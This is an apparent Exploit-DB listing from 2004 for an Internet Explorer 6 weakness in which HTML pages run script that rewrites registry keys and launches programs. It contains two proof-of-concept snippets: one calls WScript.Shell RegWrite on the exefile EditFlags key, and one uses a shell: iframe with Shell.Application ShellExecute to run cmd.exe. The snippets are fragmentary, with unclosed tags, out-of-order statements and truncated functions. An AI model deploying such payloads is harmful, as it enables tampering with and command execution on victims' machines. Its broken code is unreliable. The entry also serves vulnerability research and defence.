Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness

ID EDB-ID:24249
Type exploitdb
Reporter http-equiv
Modified 2004-07-03T00:00:00


Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness. Remote exploit for windows platform


Microsoft Internet Explorer is reported prone to a security weakness that may permit malicious HTML documents the ability to execute script code. This script code has the ability to alter registry settings that may allow for further attacks. In conjunction with other vulnerabilities, execution of attacker-supplied binaries may also be possible.

In particular, it is reported possible to alter the registry to allow for previously patched vulnerabilities to be exploitable again.

Exploitation of this weakness typically requires other vulnerabilities to redirect the browser into the Local Zone (or other appropriate Security Zone). Other attack vectors also exist, such as enticing a user to download an HTML document to their system then opening it with the Web browser. HTML email may also provide an attack vector for this weakness (in combination with other vulnerabilities). Cross-site scripting and HTML injection vulnerabilities in Web applications may also provide a surreptitious attack vector in unsuspecting clients. 

"Matthew Murphy" <> proposed:
<script language="JavaScript" defer>
function throw_onload() {
actx.RegWrite("HKCR\\exefile\\EditFlags", 0x38070000, "REG_BINARY");
var actx = new ActiveXObject("WScript.Shell");
actx.RegWrite("HKCR\\exefile\\EditFlags", 256, "REG_BINARY");
document.writeln("<IFRAME SRC=\"\"
ONLOAD=\"throw_onload()\" />");
window.setTimeout("throw_onload()", 5000); // Don't know for sure if IE
fires OnLoad for .exe files! Anyone?

"" <> presented:
<iframe src="shell:windows\web\tip.htm"
<textarea id="code" style="display:none;">
<script language="JScript" DEFER>
alert('attempting injection');
var obj=new ActiveXObject("Shell.Application");
obj.ShellExecute("cmd.exe","/c pause");
<script language="javascript">
function doit() {
setTimeout("doit()", 2000);